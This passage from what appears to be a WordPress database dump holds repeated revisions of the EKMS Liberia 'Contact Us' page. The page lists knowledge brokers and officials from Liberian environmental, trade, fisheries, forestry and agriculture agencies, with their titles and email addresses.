/>Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 08:51:36','2021-03-23 08:51:36','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3592,42,'2021-03-23 08:54:31','2021-03-23 08:54:31','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 08:54:31','2021-03-23 08:54:31','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3593,42,'2021-03-23 08:54:31','2021-03-23 08:54:31','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 08:54:31','2021-03-23 08:54:31','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3594,42,'2021-03-23 08:54:32','2021-03-23 08:54:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img 